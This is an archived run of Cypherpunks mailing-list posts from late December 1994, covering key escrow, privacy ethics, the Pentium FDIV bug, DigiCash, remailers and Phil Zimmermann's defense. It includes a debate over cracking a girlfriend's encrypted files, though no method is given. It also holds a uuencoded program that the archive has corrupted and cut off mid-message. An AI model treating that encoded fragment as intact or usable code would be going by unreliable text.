Uni, if the laws did not reflect your own moral stand regarding the uses of technology, would you nevertheless not have any personal thoughts at all on the matter? Laws come from the mind of mankind, you know, not vice versa. (Unless, of course, one is mindless and absolutely needs someone else's decisions to guide their moral reasoning.) .. Blanc From blancw at pylon.com Wed Dec 28 23:47:02 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Wed, 28 Dec 94 23:47:02 PST Subject: Morality masks technical ignorance Message-ID: <199412290747.XAA10148@deepthought.pylon.com> Responding to msg by rishab: I always thought the emphasis on this list was on _technological_ rather than _political_ or _legal_ or _moral_ means to protect privacy and free expression - including the current limitations. ....................................................... So Rishab - do you think there's any good reason why governments shouldn't require the implementation of key escrow (GAK) (I mean, aside from what something like the US Constitution would have to say about it), or any good reason why any cypherpunk should protest it? The key words in my inquiry are *reason why*. .. Blanc From lmccarth at freya.cs.umass.edu Thu Dec 29 02:08:36 1994 From: lmccarth at freya.cs.umass.edu (lmccarth at freya.cs.umass.edu) Date: Thu, 29 Dec 94 02:08:36 PST Subject: Premier Rae of Ontario Message-ID: <199412291013.FAA20889@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- A week or so ago I incorrectly referred to Bob Rae as the Prime Minister of Canada, when he is in fasct the Premier of the Province of v Ontario. As a former resident of OttOttawa, I'm well aware of the division of Canada into provinces. I misunderstood not the nature of the office itself, but rather the identity of the individual involved. I appreciate being corrected, but now I *have* been corrected, I really don't need any more mail about the issue. Thanks BTW this message is full of typos because I'm using a typically lousy terminal emulator program on dialup from a PC to a Unix system, which does not offer any support (AFAIK) for the crucially-important backspace key/ character. Suggestions on any sort of packasge offering an improvement would be welcomed. The ones I have now offer me heaps of fancy features I never use, and hold my hand through many parts where I don't need it. Incompatible standards sauck. This is very annoying so I'm getting out now. (Not signing because this connection is terrible) - -L. Futplex McCarthy - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwKLzyoZzwIn1bdtAQEDwQGAje19PbaItVp7+fGPu7k/81IWixDxKsEE GKfVfoSKLxpLfGXv6cW2Vd9vSGIqXqxq =c1pZ -----END PGP SIGNATURE----- From dubois at csn.org Thu Dec 29 06:42:30 1994 From: dubois at csn.org (Philip L. Dubois) Date: Thu, 29 Dec 94 06:42:30 PST Subject: Phil Zimmermann Message-ID: <199412291442.AA18076@teal.csn.org> -----BEGIN PGP SIGNED MESSAGE----- Phil Zimmermann and his defense team are heartened by the substantial outpouring of support that has been demonstrated through numerous postings in this and other news groups. As we approach a crucial meeting with the prosecutor, it is particularly encouraging to see that many others are willing to devote themselves, both financially and through volunteered time, to Phil's defense. A number of postings have suggested a variety of support activities ranging from petitions to the President to gatherings in San Jose. Phil's lawyers are concerned that some of these activities would not assist in our efforts to protect his legal interests and could in fact hurt. The upcoming meeting with the prosecutor is not a court hearing, but is a private meeting of counsel. Neither Phil nor any judicial official will be present. It will not be a trial or hearing, but a discussion with the Assistant United States Attorney who is handling Phil's case. As such, it is not an appropriate setting for any public demonstrations of support for Phil or for unrestricted dissemination of cryptography. What Phil needs at that meeting is a quiet environment in which serious legal issues can be discussed candidly in an effort to avoid the necessity for any trial. Given the purposes and importance of the meeting, we -- and most especially Phil ZImmermann -- ask that any of his supporters not come to San Jose for any form of public demonstration. We encourage you instead to continue to support Phil's defense by financial contributions. Communications of support to government officials in Washington, DC are also appropriate and helpful. To the extent that effective representation of Phil's interest permits us to communicate with his supporters, we will periodically post announcements to this and other appropriate news groups. Philip L. Dubois Lawyer -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLwJTObZ7C+AHeDONAQH1jAP/T6ZMSIAbgjfLliPbDALVMaOkuHBHGdeq ny0KPsZhIz6/K6ate8yr1uF84RtdolHMx73DBpSf6L9H7d3zcPVfy3ArAv44J/kZ jX0y36eCcn9pxhtU+41k9vkSLnGaNdiM5JKpehbRLgP0Gm+dAq0tbGNIXwL0XOEq CKmZXTWj/vs= =4hhB -----END PGP SIGNATURE----- From camp at industrial.com Thu Dec 29 07:01:09 1994 From: camp at industrial.com (camp at industrial.com) Date: Thu, 29 Dec 94 07:01:09 PST Subject: This list and a question Message-ID: I just joined this list last week, I may have been greviously mistaken, but I thought that this list talked about technical issues of being a cypherpunk. It seems to me that most of the things posted here belong is a newsgroup rather than in my mailbox. So I guess the question is: Is there a cypherpunk newsgroup, and if there isn't why? I am not complaining so much about the content, but I get so many mail messages about things that I would just as soon miss in my mail box that I have a hard time finding the messages that I do want. Just a thought. . . . Hey and is there some sort of FAQ? gemnis From adam at bwh.harvard.edu Thu Dec 29 07:34:49 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 29 Dec 94 07:34:49 PST Subject: Morality masks technical ignorance In-Reply-To: <199412290747.XAA10148@deepthought.pylon.com> Message-ID: <199412291533.KAA04604@bwh.harvard.edu> The technical reason to oppose GAK is that it adds points of failure to a crypto system which need not be there. Those POF are not adequately tied to the consequences of their actions (releasing a key improperly), and as such will be used as points to attack the integrity of the system. Adam Blanc wrote: | Responding to msg by rishab: | | I always thought the emphasis on this list was on | _technological_ rather than _political_ or _legal_ or _moral_ | means to protect privacy and free expression - including the | current limitations. | ....................................................... | | So Rishab - do you think there's any good reason why | governments shouldn't require the implementation of key escrow | (GAK) (I mean, aside from what something like the US | Constitution would have to say about it), or any good reason | why any cypherpunk should protest it? | | The key words in my inquiry are *reason why*. From bshantz at spry.com Thu Dec 29 08:42:41 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Thu, 29 Dec 94 08:42:41 PST Subject: Pentium FDIV Message-ID: <199412291643.IAA25785@homer.spry.com> Haven't seen too much discussion of this and how it would affect crypto in general. Would the FDIV problem cause any problems when looking at large prime numbers? Actually, let me rephrase that, would it affect determining if a large number is prime? Floating point errors can be so much fun. Also, does anyone have the "test" that was floating around the net and in various newspapers a few weeks to see if your machine has the FDIV problem. I lost the little "post-it note" I had it written on. Since then, I haven't been able to reproduce it. (Either the bug went away, or I entered the wrong numbers. **GRIN**) --Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 --------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From paul at poboy.b17c.ingr.com Thu Dec 29 09:08:20 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 29 Dec 94 09:08:20 PST Subject: DigiCash unlicensed for US use In-Reply-To: Message-ID: <199412291706.AA05312@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Rishab wrote: > Someone: > > > > > I don't think so. It appears that the initial implementation of > > >DigiCash works exactly that way [based on what I've read on their W3 > > >server]. Of course, I could tell you more exactly had they replied to > > >any of my four separate attempts to try it out .. > > > > Interesting. I too have made four requests and still not received any > > software. Can you say "vapor?" > > > > dave > It says very clearly at the DigiCash web site that the technology is NOT > LICENSED FOR USE IN THE USA. I've been using the client quite happily from > India; though I know for sure that US sites (eg. HotWired) have e-cash > servers, there are obviously difficulties in using it there. Not. What one page on their server (http://www.digicash.com/ecash/ecash-win.html) used to say was that there are two versions of the MS Windows client. One uses the PGP 2.3 MPI library, and that version is not licensed for US use; the other uses the RSAREF library, and, while slower, it's legal for US users. There's now only one choice for the MS Windows version-- I suspect that means that v2.02 and later use only the RSAREF library. Actually, there's not a separate ecash "server" per se. If you want to accept ecash payments (plug: check out my store at http://www.iquest.com/~fairgate), you just write a CGI script that calls the ecash client. Nothing much to it. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwLsnafb4pLe9tolAQEU9wP/Qfw3ooE36BThLZhJzA5c0mofxxok7NL+ 9Pkvv7erVsbad8wOC0gjOGDe+NHSznBPBjbMPITXJApSEJiEnmEJZNeBd3fWhhzL Ze0/p6FKUusHSkpjKos7kWvycg/Shkzhkplh/vil6We8fmBYG49l+f4EaBgIJEvh RgecCqkk8iQ= =r/d7 -----END PGP SIGNATURE----- From paul at poboy.b17c.ingr.com Thu Dec 29 09:10:36 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 29 Dec 94 09:10:36 PST Subject: Pentium FDIV In-Reply-To: <199412291643.IAA25785@homer.spry.com> Message-ID: <199412291710.AA05400@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > Haven't seen too much discussion of this and how it would affect crypto in > general. Would the FDIV problem cause any problems when looking at large > prime numbers? Actually, let me rephrase that, would it affect determining > if a large number is prime? Floating point errors can be so much fun. I don't know how you missed it; it was certainly here. Let me summarize: - crypto typically uses integers - RSA crypto uses large integers - the Pentium FDIV bug only affects floats - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwLtj6fb4pLe9tolAQGNXAQAy61AjCjq10ZnsmozlpzanYLqtOib1Hfw hW1M6uh6sYe7fAqhgILJ0OSKuOkCtXoHHX/rMBchrYdPr/LCUSZHoXQHvxQJpYWb B+jBegxBO+vKa/yOV/JgzVSsg2jCraxnextAXSXuniZU149+MWhp0wQ1Pmh19BqD 2J7wRHVehMs= =kebO -----END PGP SIGNATURE----- From jrt at asiaonline.net Thu Dec 29 09:12:30 1994 From: jrt at asiaonline.net (jRT) Date: Thu, 29 Dec 94 09:12:30 PST Subject: Pentium FDIV In-Reply-To: <199412291643.IAA25785@homer.spry.com> Message-ID: Try (4,195,835 x 3,145,727) ----------------------- 3,145,727 A faulty Pentium returns 4,195,579. Regds ------------------------------------------------------------------------------ jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG. Help protect the environment : This message is made from recycled electrons ------------------------------------------------------------------------------ On Thu, 29 Dec 1994 bshantz at spry.com wrote: > Haven't seen too much discussion of this and how it would affect crypto in > general. Would the FDIV problem cause any problems when looking at large > prime numbers? Actually, let me rephrase that, would it affect determining if > a large number is prime? Floating point errors can be so much fun. > > Also, does anyone have the "test" that was floating around the net and in > various newspapers a few weeks to see if your machine has the FDIV problem. I > lost the little "post-it note" I had it written on. Since then, I haven't > been able to reproduce it. (Either the bug went away, or I entered the wrong > numbers. **GRIN**) > > --Brad > > >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< > Brad Shantz bshantz at spry.com > Senior Software Engineer > SPRY Inc. Direct #: (206)-442-8251 > --------------------------------------------------------------------- > PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html > Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< > > From sandfort at crl.com Thu Dec 29 09:37:42 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 29 Dec 94 09:37:42 PST Subject: HACK ATTACK Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Was I the only one who saw ``Hack Attack'' on the Discovery Channel? The promos were typically sensationalistic. `In cyber- space, there is no privacy.' `Teenage hackers can read, change or destroy your computer files.' `No one is safe.' Yada, yada, yada. Phyber Optik was interviewed in prison. A number of events were illustrated using `dramatic re-enactments.' Cop types told scary stories that, more often than not, ended with a statement like, ``The meltdown was caused by a programming error, but it could just have easily been done by a malicious teenage boy in his bedroom.'' They did do a fair job of defining and distinguishing the terms: `hacker,' `phreaker' and `cracker.' However, I don't recall ANY mention of encryption as a means of protecting privacy. Anyone else see it? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From matthewn at uiuc.edu Thu Dec 29 09:57:33 1994 From: matthewn at uiuc.edu (Matt Hewn) Date: Thu, 29 Dec 94 09:57:33 PST Subject: Breaking into girlfriend's files Message-ID: <199412291757.AA28913@ux1.cso.uiuc.edu> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com From: Matt Hewn > Black Unicorn writes: > > > Person A requests information. > > Person B says no, because the use of the information is unsound in > > person B's view. > > Censorship? You tell me. > > Not unless person B is trying to force other people not to give out the > information. Failure to release the information himself is not censorship; > it doesn't matter what his reasons for doing so are. Person A requests information from Group C. Person B is a member of Group C. Person B does not ignore Person A. Person B does not speak with Person A. Person B responds to Person A by addressing Group C. Why? If the last sentence I quoted is true, then why tell _us_ why he won't release the information. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBFAgUBLwL4cofkdnX+hcrBAQG+bAGAiXtYzCTQ2+3OOyi+CZg8aAQOS3Yw0w4R OqzDaiy03wyj+CviwvYQl/0GpoOG0d4B =TRQR -----END PGP SIGNATURE----- -- Matt Hewn -- Information is not knowledge; knowledge is not wisdom; wisdom is not truth. Truth is absolute. From jim at acm.org Thu Dec 29 10:07:40 1994 From: jim at acm.org (Jim Gillogly) Date: Thu, 29 Dec 94 10:07:40 PST Subject: Pentium FDIV In-Reply-To: <199412291710.AA05400@poboy.b17c.ingr.com> Message-ID: <199412291807.KAA19437@mycroft.rand.org> > paul at poboy.b17c.ingr.com (Paul Robichaux) writes: > I don't know how you missed it; it was certainly here. Let me summarize: > - crypto typically uses integers > - RSA crypto uses large integers > - the Pentium FDIV bug only affects floats Yes, but Prof. Nicely found the problem because he was using FDIV when doing something or other with large potential primes. For most of our crypto stuff integer is fine, but for some operations on 33- to 50-bit integers it may be faster to use the floating point ops, since IEEE fp is supposed to be exact for integers up to some number of bits in the 50's. Jim Gillogly Sterday, 7 Afteryule S.R. 1995, 18:07 From matthewn at uiuc.edu Thu Dec 29 10:44:48 1994 From: matthewn at uiuc.edu (TheElusiveMatthew) Date: Thu, 29 Dec 94 10:44:48 PST Subject: Breaking into girlfriend's files Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Sorry to mail this twice, but I realized I munged the attributions, and wanted to get it right. Ken Arromdee wrote: > Black Unicorn wrote: > > > Person A requests information. > > Person B says no, because the use of the information is unsound in > > person B's view. > > Censorship? You tell me. > > Not unless person B is trying to force other people not to give out the > information. Failure to release the information himself is not censorship; > it doesn't matter what his reasons for doing so are. Person A requests information from Group C. Person B is a member of Group C. Person B does not ignore Person A. Person B does not speak with Person A. Person B responds to Person A by addressing Group C. Why? If the last sentence I quoted is true, then why tell _us_ why he won't release the information? TheElusiveMatthew -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBFAgUBLwMDqIfkdnX+hcrBAQG5gwGAmsK9B5hFkxrre8bvaMEl428irlLSHFZf zXocaI55xpr4ZvImCPpI/BNpKhUI0o6f =sBQJ -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Thu Dec 29 10:52:48 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 29 Dec 94 10:52:48 PST Subject: rfcs 1750 & 1751 Message-ID: <199412291855.NAA28421@hermes.bwh.harvard.edu> FYI, RFCs 1750 & 1751 have been issued. 1750 discusses generating strong random numbers. 1751 standardizes a means of converting a 128 bit number to a set of English words. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From p.v.mcmahon.rea0803 at oasis.icl.co.uk Thu Dec 29 11:38:29 1994 From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk) Date: Thu, 29 Dec 94 11:38:29 PST Subject: rfcs 1750 & 1751 Message-ID: <9412291940.AA05433@getafix.oasis.icl.co.uk> > FYI, RFCs 1750 & 1751 have been issued. 1750 discusses generating > strong random numbers. 1751 standardizes a means of converting a 128 ^^^^^^^^^^^^ > bit number to a set of English words. Both are informational, and don't represent standards of any kind - although RFC1750 has been subject to extensive review and scrutiny within the IETF security area. - pvm From witter at utdallas.edu Thu Dec 29 12:03:48 1994 From: witter at utdallas.edu (witter at utdallas.edu) Date: Thu, 29 Dec 94 12:03:48 PST Subject: HACK ATTACK In-Reply-To: Message-ID: On Thu, 29 Dec 1994, Sandy Sandfort wrote: > > Was I the only one who saw ``Hack Attack'' on the Discovery > Channel? The promos were typically sensationalistic. `In cyber- > space, there is no privacy.' `Teenage hackers can read, change > or destroy your computer files.' `No one is safe.' Yada, yada, > yada. I had to tape it, but yeah, I saw it. Seemed a bit retro-War Games type documentary to me also... > They did do a fair job of defining and distinguishing the terms: > `hacker,' `phreaker' and `cracker.' However, I don't recall ANY > mention of encryption as a means of protecting privacy. I also noticed that their re-enactor was wearing surgical gloves...? Seems a little strage since they supposed he was a teenager at home. Then again, perhaps he knows something about privacy that we do not? (I knew someone was rating out on me, never guessed it was my keyboard...) Also, in one of the re-enactment he states," I'm in! I control the horizontal and the vertical..." yeah buddy, well I've got the brightness and contrast too...sheesh! Perhaps The Dicovery Channel would like to know about encryption, etc. They listed their addres as: pheedback at discovery.com [No signature, but here's my photo..] ......... . ''''' . . O O . . u . . \_/ . ......... From rsalz at osf.org Thu Dec 29 12:37:57 1994 From: rsalz at osf.org (Rich Salz) Date: Thu, 29 Dec 94 12:37:57 PST Subject: HACK ATTACK Message-ID: <9412292034.AA21108@sulphur.osf.org> > in one of the re-enactment he states," I'm in! I control the > horizontal and the vertical..." It's a tag line from the old TV show The Outer Limits. /r$ From rishab at dxm.ernet.in Thu Dec 29 12:58:42 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Thu, 29 Dec 94 12:58:42 PST Subject: Morality masks technical ignorance Message-ID: blancw at pylon.com: > Responding to msg by rishab: > I always thought the emphasis on this list was on > _technological_ rather than _political_ or _legal_ or _moral_ > means to protect privacy and free expression - including the > current limitations. > ....................................................... > So Rishab - do you think there's any good reason why > governments shouldn't require the implementation of key escrow > [...] > The key words in my inquiry are *reason why*. And the key word in _my_ post was _means_, not _reason why_. I.e. that (in my view of the Cpunk position) one can protect privacy not through morals, policies or law, but through technology. There may be very good reasons why governments should not require the implementation of key escrow, or why people shouldn't pry into their girlfriends' secrets (which if you really want to know I find reprehensible). Unfortunately those reasons of morality need not prevent the actions. Which is why Cypherpunks discuss untraceable anonymous remailers despite occasionally (aka Detweiler, for instance) decrying their (immoral) misuse, and why they should discuss breaking Norton Encrypt (or DES, or Skipjack, or 16384-bit RSA keys), while giving sermons about immoral boyfriends. Nobody (the Single-Horned One included) thinks reading other peoples' mail is moral, but that should not preclude a legitimate discussion of crypto technology. As it so happens, hardly anyone here knew about Norton Encrypt so we got embroiled in this argument. If we were to adopt a consistently (and solely) moral stance, we would accept Detweiler's position that remailers are bad and should be banned because they can be easily misused. Well, I guess these are the glitches in discourse we have to face on a list that's for both technology and policy. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From dcwill at python.ee.unr.edu Thu Dec 29 13:33:03 1994 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Thu, 29 Dec 94 13:33:03 PST Subject: Pentium FDIV In-Reply-To: <199412291643.IAA25785@homer.spry.com> Message-ID: <199412292132.NAA18542@python> > Also, does anyone have the "test" that was floating around the net and in > various newspapers a few weeks to see if your machine has the FDIV problem. I > lost the little "post-it note" I had it written on. Since then, I haven't > been able to reproduce it. (Either the bug went away, or I entered the wrong > numbers. **GRIN**) This is from the djgpp (DOS port of gcc) mailinmg list, posted by the author of said port himself. It's short enought to post and might be helpful to some. Flames will be forwarded to postmaster at intel.com. =D.C. Williams ==============INCLUDED MESSAGE BELOW=========================== Subject: Intel recalls Pentium Status: RO CNN reported this weekend that Intel has announced that they will replace ALL defective Pentium(tm) processors, no questions asked. To determine if your Pentium(tm) is devective, run the attached MS-DOS program FDIVBUG1.COM (source included also). It will tell you if you have the bug and where to call for a replacement if needed. DJ -- begin 644 fdivbug1.zip M4$L#!!0``@`(``B*F1U]4E at Z>@$``+<"```,````9F1I=F)U9S$N87-M=5)+ M3\,P##Z[4O^#A9!ZZ5#;O?S MYT<_FQFQ`?H:T5HL/ZS`75?6DN$94UR3& M;)Z)7T(ZCC%-8HS6-)3L&KQ>/V+9;9`+*YA5.J9)<7F#2U$K+45$?4^F+5=/ M/N\\ZJNK5\>+I,';NP?<:6&(&5'6D/E=X2NA++C/6-W_8?<]HZNBKG'56E%C M83$=Y4DRFF7Y*)_E,ZR41BUV=<&$UU>VA#2%E:K]-?./SH.Q>4>JLQY35V`J0AK7S%H?]1>])DV#-7SP2$@6[F:`0 at .U#$&.`+IAO__W8$T+U=`:EY)9FFN at EM`J$)2 M:;I"2FI):G))?I&.0E*E at HN7@DMJ3GY19BJ20A?/,+!*E Message-ID: <9412292143.AA21512@toad.com> >Rishab Aiyer Ghosh: >As it so happens, hardly anyone here knew about Norton Encrypt so we got >embroiled in this argument. If we were to adopt a consistently (and solely) >moral stance, we would accept Detweiler's position that remailers are bad >and should be banned because they can be easily misused. There is a difference between believing that something is wrong (a moral stance), and believing that force should be used to stop it (a ban). A consistent position, for someone believing remailers are bad, would be that they personally wouldn't run a remailer or tell other people how to do so. It would not require advocating bans on remailers. And trying to _convince_ other people not to do something, without the threat of force, is not _banning_. -- Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu) "No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova From ravage at bga.com Thu Dec 29 16:01:09 1994 From: ravage at bga.com (Jim choate) Date: Thu, 29 Dec 94 16:01:09 PST Subject: HACK ATTACK In-Reply-To: Message-ID: <199412300001.SAA01594@zoom.bga.com> > > > Perhaps The Dicovery Channel would like to know about encryption, etc. > They listed their addres as: > > pheedback at discovery.com > > You can also ftp to discovery.com where they have a small collection of text files. Happy New Year! From rah at shipwright.com Thu Dec 29 16:23:08 1994 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 29 Dec 94 16:23:08 PST Subject: HACK ATTACK Message-ID: At 9:36 AM 12/29/94, Sandy Sandfort wrote: >Was I the only one who saw ``Hack Attack'' on the Discovery >Channel? The promos were typically sensationalistic. `In cyber- >space, there is no privacy.' `Teenage hackers can read, change >or destroy your computer files.' `No one is safe.' Yada, yada, >yada. They should do a Nova episode to set the record straight. Anyone know a producer at WGBH in Boston? I might, but the string may be a bit too skinny to pull on. If anybody wants to egg me on, send me e-mail, but there might be a more direct connection than any I could dig up... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From greg at ideath.goldenbear.com Thu Dec 29 16:53:07 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 29 Dec 94 16:53:07 PST Subject: ideath remailer erratic over New Years' weekend Message-ID: <199412300051.AA04536@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- The anon remailer at ideath.goldenbear.com will likely be available only erratically over the next few days; after the move it will be co-located at a site featuring a 56K frame relay connection, so reliability should be good after that. I don't anticipate losing any traffic, but mail will be travelling via dialup UUCP not TCP/IP until the move is complete and the DNS data is updated. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwNY7n3YhjZY3fMNAQE9PAP9HQCb+GlzH2pbuYCatjuX9Rlt/YHfSXmv wC87jhLWi5KneMwbaf49mj2JGNCHtNC+VPetofB/dNvrQyfeRHpJEiDrJlg5q8DS 31L5zh7lTp3yybUlmCVBR7ovn9LAgPui6xMfIKqRtQ9Q7d99E58fBROctdbFxtUM rnA0kdCjq94= =LkeA -----END PGP SIGNATURE----- From nobody at replay.com Thu Dec 29 17:27:27 1994 From: nobody at replay.com (Name withheld on request) Date: Thu, 29 Dec 94 17:27:27 PST Subject: No Subject Message-ID: <199412300127.AA13833@xs1.xs4all.nl> Anybody know where there are compiled, ready to use versions of triple DES? From wcs at anchor.ho.att.com Thu Dec 29 18:07:20 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Thu, 29 Dec 94 18:07:20 PST Subject: Breaking into girlfriend's files Message-ID: <9412300205.AA16377@anchor.ho.att.com> Gentlemen don't read their girlfriends' mail, either..... On the other hand, if the original poster was telling the truth, he _did_ at least say he was trying to read his girlfriend's files, rather than saying "I used Norton Encrypt on some files for a project last year, and I've forgotten the password - is there some way to recover it?" which would have been sleazy and not started a flamewar. Or, if he wasn't telling the truth, maybe he's really trying to break his business competitor's files, or some government's, or he's really L..D.. in yet another disguise. Bill From camp at industrial.com Thu Dec 29 22:15:26 1994 From: camp at industrial.com (camp at industrial.com) Date: Thu, 29 Dec 94 22:15:26 PST Subject: Thanx Message-ID: I think I am a more enlightened individual now. First thing when I get back into FTP land I get the FAQ (cool faq name BTW). I was not intending to criticize, it just seemed to be alot more flamish than I expected and I guess that is what expecting things does. gemnis From blancw at pylon.com Thu Dec 29 22:41:16 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 29 Dec 94 22:41:16 PST Subject: Morality masks technical ignorance Message-ID: <199412300642.WAA27643@deepthought.pylon.com> Responding to msg by Adam Shostack ( when bad things happen to good crypto): The technical reason to oppose GAK is that it adds points of failure to a crypto system which need not be there. Those POF are not adequately tied to the consequences of their actions (releasing a key improperly), and as such will be used as points to attack the integrity of the system. ............................................................... And if there were no points of failure added by it, would you approve, agree, to its mandatory requirement? .. Blanc From blancw at pylon.com Thu Dec 29 22:41:33 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 29 Dec 94 22:41:33 PST Subject: Morality masks technical ignorance Message-ID: <199412300642.WAA27667@deepthought.pylon.com> Responding to msg by rishab: :And the key word in _my_ post was _means_, :not _reason why_. Oh - I thought maybe it was "ours is not to reason why". ( kidding! ) :I.e. that (in my view of the Cpunk position) one :can protect privacy not through morals, policies or :law, but through technology. I also don't see much success in attempting to protect privacy through the promotion of morals, policies, or laws, either. However, the list is always engaged in discussing 'privacy rights' as a basis for their own objections to governments' attitudes against the unfettered use of new technologies. Recognizing that we all live in a context made up of philosophical stands, politics, and legalities, and that as you said, "these are the glitches in discourse we have to face on a list that's for both technology and policy", it can't seem real to position this aspect completely out of the realm of thought as a non-valid element. Some people are going to want to think of the applications of technology in moral terms, and in a free society one must make allowances for those kinds of people. It should be possible to at least think about its proper place, occasionally, without suffering too much from the association. .. Blanc From jamesd at netcom.com Thu Dec 29 23:55:48 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 29 Dec 94 23:55:48 PST Subject: Morality masks technical ignorance In-Reply-To: <199412300642.WAA27667@deepthought.pylon.com> Message-ID: On Thu, 29 Dec 1994 blancw at pylon.com wrote: > I also don't see much success in attempting to protect privacy > through the promotion of morals, policies, or laws, either. If we fail to point out that people have a right to privacy, if we fail to point out the moral and constitutional implications of coercive inspection, then our enemies win, by citing tax evaders child pornographers terrorists and pedophiles. Public key technology is totally ineffective against rubber hoses. How people are to live together peaceably is always first and formost a moral question. If all morality is relative, then the only possible way for people to live together peaceably is for a single authority to define morality absolutely by its arbitrary will and to impose that morality by as much violence as necessary -- this is the classic argument (Hobbes, Nazis) for absolutist government. If this is so, then of course private cryptography must be suppressed, and private ownership of guns, and as much as of the internet as is necessary to ensure that communication is strictly few to many rather than many to many. There are good historical examples of this kind of thing: In Japan, under feudalism, science and technology was proceeding well. They got hold of a western gun, and rapidly produced large number of excellent imitations. Now feudalism in Japan was based primarily on the fact that a samurai, trained from infancy in the are of war, wearing carefully tailored armor, could easily defeat a peasant with a sword. But they soon realized that guns were equalizers -- that a peasant with a gun was roughly equal to a samurai with a gun, even though a peasant with a sword was totally unequal to a samurai with a sword. So they banned guns, not only for the peasants, but for themselves, and ordered a halt to technology. This coercive reversal of technology was completely effective until outsiders with guns started knocking on their door. An even more relevant example is paper. When paper was first discovered, the Chinese government, forseeing the revolutionary threat posed by paper, made it a state monopoly, made private possession of the knowledge of paper manufacture punishable by death, castrated those permitted to make paper so that the knowledge would not be passed from father to son, and successfully kept paper to themselves for a very long time. This monopoly was broken when western barbarians kidnapped some of the eunuchs. This immediately made woodcut printing feasible, which had strong revolutionary effects, and eventually led to moveable type printing, which had even greater revolutionary effects. Note that the technology did not have revolutionary effects until it got into the hands of those who had strong moral beliefs, based on natural law theory, beliefs that led to the position that the king could not make law as he pleased, that many actions of the state were unlawful. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From prz at acm.org Fri Dec 30 00:06:43 1994 From: prz at acm.org (Philip Zimmermann) Date: Fri, 30 Dec 94 00:06:43 PST Subject: January meeting with Zimmermann's prosecutor Message-ID: The following is a message from my lawyer, Phil Dubois. He posted it to alt.security.pgp, and I thought I should post it here as well. The message is signed with his key. --Philip Zimmermann -----BEGIN PGP SIGNED MESSAGE----- Phil Zimmermann and his defense team are heartened by the substantial outpouring of support that has 